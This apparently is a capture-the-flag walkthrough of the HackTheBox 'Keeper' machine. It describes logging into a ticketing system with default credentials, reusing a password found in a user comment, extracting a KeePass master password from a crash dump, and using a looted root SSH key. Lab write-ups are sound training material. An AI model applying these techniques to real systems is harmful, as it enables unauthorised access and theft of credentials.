4 minutes
HackTheBox :: Keeper
Creator: knightmare
Machine URL: https://app.hackthebox.com/machines/Keeper
Difficulty: Easy
Initial enumeration
As usual, we start with a TCP nmap
scan.
Only two ports are open: TCP 80 for nginx and TCP 22 for SSH.
We will target the Web Server on TCP 80 first.
nginx
After navigating to the machine IP in the browser, we are greeted with a simple web page:
After adding keeper.htb
and tickets.keeper.htb
to our hosts file, we can visit http://tickets.keeper.htb/rt/
Best Practical Request Tracker (RT)
We have the login page for Best Practical Request Tracker (RT):
Software version: 4.4.4
Source code: GitHub
We note that the version is fairly old and we may find some unpatched vulnerabilities.
But first, we can try the default username and password.
Fortunately, root:password
works!
Interesting tickets
There is only one of interest – http://tickets.keeper.htb/rt/Ticket/Display.html?id=300000
We note the info it gives us:
- root (Enoch Root) had issues with a KeePass database on Windows and attached its crash dump to an issue.
- lnorgaard (Lise Nørgaard) removed the attachment and saved it to their home folder for security reasons.
Credentials for lnorgaard
While further walking the app, in the Admin –> Users section we find a default password for user lnorgaard in their comments section:
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
These credentials are reused and we can SSH to the box as lnorgaard.
lnorgaard
Grab a user flag in /home/lnorgaard/user.txt
The home folder contains a ZIP archive RT30000.zip. This must be the file relevant to the ticket we’ve seen before.
Transfer it to the attacking machine and unzip it.
We get the crash dump for KeePass and a KeePass database file.
Extracting the KeePass master password from the dump file
It may be possible to extract the master password from the dump file!
I’ve attempted to use this Python script for the task: https://github.com/CMEPW/keepass-dump-masterkey
There are some issues with special characters. A quick Google search for dgrd med flde
reveals the name of the Danish dish – Rødgrød med fløde
.
I will use the kpcli
utility to interact with the KeePass database file that we have looted.
Success! The KeePass database master password is rødgrød med fløde
.
Let’s find some credentials.
SSH Private Key for root
It looks like we have a root SSH private key for PuTTY!
Let’s convert it to the OpenSSH-acceptable format with puttygen
:
And use the key to SSH:
We are root!
Grab the root flag in /root/root.txt and we are done.